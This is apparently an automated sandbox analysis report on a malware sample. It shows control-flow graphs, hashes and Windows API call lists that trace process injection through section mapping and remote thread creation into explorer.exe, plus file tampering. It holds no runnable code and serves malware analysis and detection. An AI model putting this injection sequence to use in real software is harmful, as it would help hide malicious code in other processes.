                                                        • Instruction Fuzzy Hash: 66D12631B44208EFDF159F64D890BBE77A2AF89310F14806AE9559B2D1CBB1DD81CB92

                                                        Execution Graph

                                                        Execution Coverage: 8.9%
                                                        Dynamic/Decrypted Code Coverage: 0%
                                                        Signature Coverage: 52.9%
                                                        Total number of Nodes: 68
                                                        Total number of Limit Nodes: 2

                                                        Control-flow Graph

                                                        control_flow_graph 0 4014d6-4014d7 1 4014c4-4014c8 0->1 2 4014d8-401519 call 401164 0->2 1->2 13 40151b 2->13 14 40151e-401523 2->14 13->14 16 401529-40153a 14->16 17 40184d-401855 14->17 21 401540-401569 16->21 22 40184b 16->22 17->14 20 40185a-401883 17->20 30 401874-40187f 20->30 31 401886-4018a3 call 401164 20->31 21->22 29 40156f-401586 NtDuplicateObject 21->29 22->20 29->22 32 40158c-4015b0 NtCreateSection 29->32 30->31 34 4015b2-4015d3 NtMapViewOfSection 32->34 35 40160c-401632 NtCreateSection 32->35 34->35 37 4015d5-4015f1 NtMapViewOfSection 34->37 35->22 38 401638-40163c 35->38 37->35 41 4015f3-401609 37->41 38->22 42 401642-401663 NtMapViewOfSection 38->42 41->35 42->22 44 401669-401685 NtMapViewOfSection 42->44 44->22 46 40168b call 401690 44->46
                                                        APIs
                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.465540582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Section$CreateDuplicateObjectView
                                                        • String ID:
                                                        • API String ID: 1652636561-0
                                                        • Opcode ID: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
                                                        • Instruction ID: b0857a4fb145544e41851af17f16183f6357fb9efc2fe45eaf6198d87de3a54a
                                                        • Opcode Fuzzy Hash: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
                                                        • Instruction Fuzzy Hash: 8681E171600248BBDB218FA5DC88FEB7FB8FF86710F10416AF951BA1E5D6749901CB64

                                                        Control-flow Graph

                                                        control_flow_graph 48 4014bf-4014c8 49 4014d8 48->49 50 4014ce-401519 call 401164 48->50 49->50 60 40151b 50->60 61 40151e-401523 50->61 60->61 63 401529-40153a 61->63 64 40184d-401855 61->64 68 401540-401569 63->68 69 40184b 63->69 64->61 67 40185a-401883 64->67 77 401874-40187f 67->77 78 401886-4018a3 call 401164 67->78 68->69 76 40156f-401586 NtDuplicateObject 68->76 69->67 76->69 79 40158c-4015b0 NtCreateSection 76->79 77->78 81 4015b2-4015d3 NtMapViewOfSection 79->81 82 40160c-401632 NtCreateSection 79->82 81->82 84 4015d5-4015f1 NtMapViewOfSection 81->84 82->69 85 401638-40163c 82->85 84->82 88 4015f3-401609 84->88 85->69 89 401642-401663 NtMapViewOfSection 85->89 88->82 89->69 91 401669-401685 NtMapViewOfSection 89->91 91->69 93 40168b call 401690 91->93
                                                        APIs
                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.465540582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Section$View$Create$DuplicateObject
                                                        • String ID:
                                                        • API String ID: 1546783058-0
                                                        • Opcode ID: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
                                                        • Instruction ID: cb32da509904316ed93400f6898fa9d135e0c3db95e2781c81c9f365a62fd76c
                                                        • Opcode Fuzzy Hash: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
                                                        • Instruction Fuzzy Hash: 8D617F71A00244FBEB219F91CC49FAF7BB8FF85B00F10412AF912BA1E4D6749A01DB65

                                                        Control-flow Graph

                                                        control_flow_graph 95 4014e8 96 4014e0-4014e5 95->96 97 4014ec-401519 call 401164 95->97 96->97 103 40151b 97->103 104 40151e-401523 97->104 103->104 106 401529-40153a 104->106 107 40184d-401855 104->107 111 401540-401569 106->111 112 40184b 106->112 107->104 110 40185a-401883 107->110 120 401874-40187f 110->120 121 401886-4018a3 call 401164 110->121 111->112 119 40156f-401586 NtDuplicateObject 111->119 112->110 119->112 122 40158c-4015b0 NtCreateSection 119->122 120->121 124 4015b2-4015d3 NtMapViewOfSection 122->124 125 40160c-401632 NtCreateSection 122->125 124->125 127 4015d5-4015f1 NtMapViewOfSection 124->127 125->112 128 401638-40163c 125->128 127->125 131 4015f3-401609 127->131 128->112 132 401642-401663 NtMapViewOfSection 128->132 131->125 132->112 134 401669-401685 NtMapViewOfSection 132->134 134->112 136 40168b call 401690 134->136
                                                        APIs
                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.465540582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Section$View$Create$DuplicateObject
                                                        • String ID:
                                                        • API String ID: 1546783058-0
                                                        • Opcode ID: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
                                                        • Instruction ID: a9c2a09af8f6974916e8dbce0e9e74a1ab8539b6b4ce2c8be6c8dc9eb24f9302
                                                        • Opcode Fuzzy Hash: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
                                                        • Instruction Fuzzy Hash: 675127B5900245BBEB209F91CC48FABBBB8EF85B00F104169FA11BA2E5D6759941CB24

                                                        Control-flow Graph

                                                        control_flow_graph 138 4014eb-401519 call 401164 143 40151b 138->143 144 40151e-401523 138->144 143->144 146 401529-40153a 144->146 147 40184d-401855 144->147 151 401540-401569 146->151 152 40184b 146->152 147->144 150 40185a-401883 147->150 160 401874-40187f 150->160 161 401886-4018a3 call 401164 150->161 151->152 159 40156f-401586 NtDuplicateObject 151->159 152->150 159->152 162 40158c-4015b0 NtCreateSection 159->162 160->161 164 4015b2-4015d3 NtMapViewOfSection 162->164 165 40160c-401632 NtCreateSection 162->165 164->165 167 4015d5-4015f1 NtMapViewOfSection 164->167 165->152 168 401638-40163c 165->168 167->165 171 4015f3-401609 167->171 168->152 172 401642-401663 NtMapViewOfSection 168->172 171->165 172->152 174 401669-401685 NtMapViewOfSection 172->174 174->152 176 40168b call 401690 174->176
                                                        APIs
                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.465540582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Section$View$Create$DuplicateObject
                                                        • String ID:
                                                        • API String ID: 1546783058-0
                                                        • Opcode ID: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
                                                        • Instruction ID: 9bfdfe9cbb785be4fdfd0dd6995845ce59af7eac5c2f91023a42677e7735ba1d
                                                        • Opcode Fuzzy Hash: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
                                                        • Instruction Fuzzy Hash: 9D5127B5900248BBEB209F91CC48FAFBBB8EF85B00F104159FA11BA2E5D6719905CB64

                                                        Control-flow Graph

                                                        control_flow_graph 178 402f5d-402f81 179 4030b4-4030b9 178->179 180 402f87-402f9f 178->180 180->179 181 402fa5-402fb6 180->181 182 402fb8-402fc1 181->182 183 402fc6-402fd4 182->183 183->183 184 402fd6-402fdd 183->184 185 402fff-403006 184->185 186 402fdf-402ffe 184->186 187 403028-40302b 185->187 188 403008-403027 185->188 186->185 189 403034 187->189 190 40302d-403030 187->190 188->187 189->182 192 403036-40303b 189->192 190->189 191 403032 190->191 191->192 192->179 193 40303d-403040 192->193 193->179 194 403042-4030b1 RtlCreateUserThread NtTerminateProcess 193->194 194->179
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.465540582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CreateProcessTerminateThreadUser
                                                        • String ID:
                                                        • API String ID: 1921587553-0
                                                        • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                        • Instruction ID: 028c31f760cafe6bdfeacd3711728474bc178c938afdf01909161d150e4b5d3c
                                                        • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                        • Instruction Fuzzy Hash: 84416831228D094FD768EF5CA845762B7D5F798351F6643AAE809D3389EA34DC1183C6

                                                        Control-flow Graph

                                                        control_flow_graph 195 4030bf-4030cf 196 4030d1-403109 195->196 197 403055-4030b1 RtlCreateUserThread NtTerminateProcess 195->197 201 403113-403118 196->201 202 40310b 196->202 198 4030b4-4030b9 197->198 203 40311a 201->203 204 40311f-403141 call 4011db 201->204 202->201 205 40310d-403110 202->205 203->204 206 40311c 203->206 211 403145 204->211 205->201 206->204 211->211
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.465540582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CreateProcessTerminateThreadUser
                                                        • String ID:
                                                        • API String ID: 1921587553-0
                                                        • Opcode ID: c30ac68ff69c2e5b18761fee067da9d71720b063899e47dfee2d3f0b6f1a7b91
                                                        • Instruction ID: 715d93b18a869b872d6bab68aa9d9aa25fe40f65b3c459de5f1da0bbea4f6161
                                                        • Opcode Fuzzy Hash: c30ac68ff69c2e5b18761fee067da9d71720b063899e47dfee2d3f0b6f1a7b91
                                                        • Instruction Fuzzy Hash: 222105309087448FE3549F7C98423A6BFE0EB4A311F6805AFD596DA2D2D33E5A46C787

                                                        Control-flow Graph

                                                        control_flow_graph 212 4018c5-40190b call 401164 Sleep call 4013cc 222 40191a-401920 212->222 223 40190d-401915 call 4014bf 212->223 226 401931 222->226 227 401928-40192d 222->227 223->222 226->227 228 401934-40194f 226->228 227->228 233 401952-40195b call 401164 228->233 234 401948-40194b 228->234 234->233
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                          • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                          • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.465540582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                        • String ID: zOji
                                                        • API String ID: 4152845823-4118548424
                                                        • Opcode ID: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
                                                        • Instruction ID: 5008de21d6646d6a4101a84352d49cb2eeb815b2728bacd1896cd8e4e39b07a0
                                                        • Opcode Fuzzy Hash: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
                                                        • Instruction Fuzzy Hash: 46018BB2308205EBDB006E949C61EAE3658AB40724F308033F607780F1C67D8A13F31B

                                                        Control-flow Graph

                                                        control_flow_graph 237 4018a6-4018c3 241 4018d4 237->241 242 4018c8-40190b call 401164 Sleep call 4013cc 237->242 241->242 252 40191a-401920 242->252 253 40190d-401915 call 4014bf 242->253 256 401931 252->256 257 401928-40192d 252->257 253->252 256->257 258 401934-40194f 256->258 257->258 263 401952-40195b call 401164 258->263 264 401948-40194b 258->264 264->263
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                          • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                          • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.465540582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                        • String ID:
                                                        • API String ID: 4152845823-0
                                                        • Opcode ID: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
                                                        • Instruction ID: ec7c9f9116aa5c3d7af92c99ccf4db412f3ff1557a2b92ce3f8b18b7d449fb36
                                                        • Opcode Fuzzy Hash: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
                                                        • Instruction Fuzzy Hash: 97016DB2308305EBE7006A959C51EBA3758AB41764F308133B607780F1957D9A17B36F

                                                        Control-flow Graph

                                                        control_flow_graph 267 4018be-4018c3 271 4018d4 267->271 272 4018c8-40190b call 401164 Sleep call 4013cc 267->272 271->272 282 40191a-401920 272->282 283 40190d-401915 call 4014bf 272->283 286 401931 282->286 287 401928-40192d 282->287 283->282 286->287 288 401934-40194f 286->288 287->288 293 401952-40195b call 401164 288->293 294 401948-40194b 288->294 294->293
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                          • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                          • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.465540582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                        • String ID:
                                                        • API String ID: 4152845823-0
                                                        • Opcode ID: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
                                                        • Instruction ID: cc5cf84a4ac16d3ff6e0150408ab5a4d949569ac012fe2ee23f61dbe8ee8ec54
                                                        • Opcode Fuzzy Hash: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
                                                        • Instruction Fuzzy Hash: 70014CB2308205EBDB106A959C51EBE3659AB55714F308133B607784F1967D9B13F32B

                                                        Control-flow Graph

                                                        control_flow_graph 297 4018b1-4018b3 298 401903-40190b call 4013cc 297->298 299 4018b5-4018c3 297->299 305 40191a-401920 298->305 306 40190d-401915 call 4014bf 298->306 303 4018d4 299->303 304 4018c8-401900 call 401164 Sleep 299->304 303->304 304->298 312 401931 305->312 313 401928-40192d 305->313 306->305 312->313 316 401934-40194f 312->316 313->316 322 401952-40195b call 401164 316->322 323 401948-40194b 316->323 323->322
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.465540582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        • Opcode ID: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
                                                        • Instruction ID: ef1b3772686a797e33556ea01ceab6b668eb93d7b49977ee198856b5a882b22d
                                                        • Opcode Fuzzy Hash: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
                                                        • Instruction Fuzzy Hash: 210125B2208245EADB006A959C61EBA3799AB41724F308137F607790F1967E8A13F31B

                                                        Control-flow Graph

                                                        control_flow_graph 326 4018c2-40190b call 401164 Sleep call 4013cc 338 40191a-401920 326->338 339 40190d-401915 call 4014bf 326->339 342 401931 338->342 343 401928-40192d 338->343 339->338 342->343 344 401934-40194f 342->344 343->344 349 401952-40195b call 401164 344->349 350 401948-40194b 344->350 350->349
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                          • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                          • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.465540582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                        • String ID:
                                                        • API String ID: 4152845823-0
                                                        • Opcode ID: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
                                                        • Instruction ID: d3c1b2561fc0583f1f6bbc3edf5ccb050f557452f45edf8007d0f6b78c0567ac
                                                        • Opcode Fuzzy Hash: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
                                                        • Instruction Fuzzy Hash: 14017CB2308205EBDB006A919C51EBE3759AB41724F308133F607780F1967D8A13F31B

                                                        Control-flow Graph

                                                        control_flow_graph 353 4018da-40190b call 401164 Sleep call 4013cc 360 40191a-401920 353->360 361 40190d-401915 call 4014bf 353->361 364 401931 360->364 365 401928-40192d 360->365 361->360 364->365 366 401934-40194f 364->366 365->366 371 401952-40195b call 401164 366->371 372 401948-40194b 366->372 372->371
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                          • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                          • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.465540582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                        • String ID:
                                                        • API String ID: 4152845823-0

                                                        Execution Graph

                                                        Execution Coverage:57.5%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:11.2%
                                                        Total number of Nodes:152
                                                        Total number of Limit Nodes:8

                                                        Callgraph


                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 02804760: NtCreateSection.NTDLL ref: 028047D2
                                                        • NtQueryInformationProcess.NTDLL ref: 028031A2
                                                        • NtQueryInformationProcess.NTDLL ref: 028031CA
                                                        • ReadProcessMemory.KERNEL32 ref: 028031FD
                                                        • ReadProcessMemory.KERNEL32 ref: 0280322B
                                                        • WriteProcessMemory.KERNEL32 ref: 028032A8
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$Memory$InformationQueryRead$CreateSectionWrite
                                                        • String ID:
                                                        • API String ID: 1349948393-0

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 2482764027-0

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateSection
                                                        • String ID: @$@
                                                        • API String ID: 2449625523-149943524

                                                        Control-flow Graph

                                                        APIs
                                                        • CryptAcquireContextA.ADVAPI32 ref: 028051A9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AcquireContextCrypt
                                                        • String ID: %02X
                                                        • API String ID: 3951991833-436463671
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateInstance
                                                        • String ID:
                                                        • API String ID: 542301482-0
                                                        APIs
                                                        • GetUserNameW.ADVAPI32 ref: 028034E4
                                                          • Part of subcall function 028035E8: CoCreateInstance.OLE32 ref: 02803635
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateInstanceNameUser
                                                        • String ID:
                                                        • API String ID: 3213660374-0

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Create$CloseHandleThread$HeapLibraryLoad
                                                        • String ID: %g?$iP+
                                                        • API String ID: 1420940861-765743493
                                                        • Opcode ID: 1abdb3b54502f18c616fd6fbb0d7aa9f562b9488b5c80a3bb4ecde1b27b04ded
                                                        • Instruction ID: b10ee02a45f19e0e5f8070d87a7ef027a2088157d4df5a107fb80439743ad1b3
                                                        • Opcode Fuzzy Hash: 1abdb3b54502f18c616fd6fbb0d7aa9f562b9488b5c80a3bb4ecde1b27b04ded
                                                        • Instruction Fuzzy Hash: 3C910638618A088FDF94EF18CCC56A573D6FB98310B48017E9C4ECB196DB34E952DB92

                                                        Control-flow Graph

                                                        APIs
                                                        • DeleteFileW.KERNEL32 ref: 02801F8E
                                                        • CopyFileW.KERNEL32 ref: 02801F9D
                                                        • DeleteFileW.KERNEL32 ref: 02801FAE
                                                        • DeleteFileW.KERNEL32 ref: 02801FF9
                                                          • Part of subcall function 02804920: SetFileAttributesW.KERNEL32 ref: 0280496F
                                                          • Part of subcall function 02804920: CreateFileW.KERNEL32 ref: 02804999
                                                          • Part of subcall function 02804920: SetFileTime.KERNEL32 ref: 028049C4
                                                        • CreateFileW.KERNEL32 ref: 02802085
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$Delete$Create$AttributesCopyTime
                                                        • String ID:
                                                        • API String ID: 642576546-0
                                                        • Opcode ID: c9a8b242e8538c8a596b46622d931eaf5b4ee49f838b165805a5d845044288d2
                                                        • Instruction ID: f76cee0920b55580d3c4e168a80583eef73ded69a24d376765d71a77410aa6f9
                                                        • Opcode Fuzzy Hash: c9a8b242e8538c8a596b46622d931eaf5b4ee49f838b165805a5d845044288d2
                                                        • Instruction Fuzzy Hash: EF414028718A4C4FCBD8AF6C589876D75D2EB9C311F50457EA80EC32C5DE789D068B92

                                                        Control-flow Graph

                                                        control_flow_graph 156 280230c-2802369 call 2803de0 159 2802817 156->159 160 280236f-2802374 156->160 162 280281d-2802837 159->162 160->159 161 280237a-280237d 160->161 161->159 163 2802383-280238e 161->163 164 2802394-28023c7 call 2804fc8 163->164 165 2802807-280280d call 2805348 163->165 164->165 171 28023cd-28023f2 call 2804f1c call 28050dc 164->171 169 2802812-2802815 165->169 169->159 169->162 176 28023f4-280240e 171->176 177 280241d 171->177 176->177 181 2802410-280241b 176->181 178 2802422-280243b call 28050dc 177->178 183 2802441-2802454 178->183 184 28025aa-28025b2 178->184 181->178 187 28024a6-28024a8 183->187 188 2802456-280249d 183->188 185 28025b8-28025bc 184->185 186 280279d-28027ca call 2803de0 184->186 191 28025c2-28025ca 185->191 192 2802664-28026f4 call 28046a0 call 2803444 call 2803de0 call 2805348 185->192 199 28027cc-28027d3 186->199 200 28027ff-2802805 186->200 187->184 190 28024ae-2802520 call 2805368 DeleteFileW CreateFileW 187->190 188->187 216 2802522-2802579 call 2804f1c call 2804fc8 WriteFile 190->216 217 280259f-28025a5 call 2805348 190->217 195 28025d0-28025dd 191->195 196 28026f9-2802726 call 2803de0 191->196 192->165 195->200 211 28025e3-28025e6 195->211 196->200 208 280272c-2802733 196->208 199->200 206 28027d5-28027d8 199->206 200->165 206->200 209 28027da-28027fa call 2802840 call 2805348 206->209 208->200 213 2802739-280273c 208->213 209->200 211->200 218 28025ec-28025f0 211->218 213->200 222 2802742-280279b call 2802840 call 28046a0 call 2805348 213->222 250 2802582-280259a call 2804920 call 28052cc 216->250 217->184 219 28025f2-280261f call 2803de0 218->219 220 2802657-280265e 218->220 234 2802651-2802655 219->234 235 2802621-2802628 219->235 220->192 220->200 222->200 234->219 234->220 235->234 239 280262a-280262d 235->239 239->234 244 280262f-280264c call 2802840 call 2805348 239->244 244->234 250->217
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
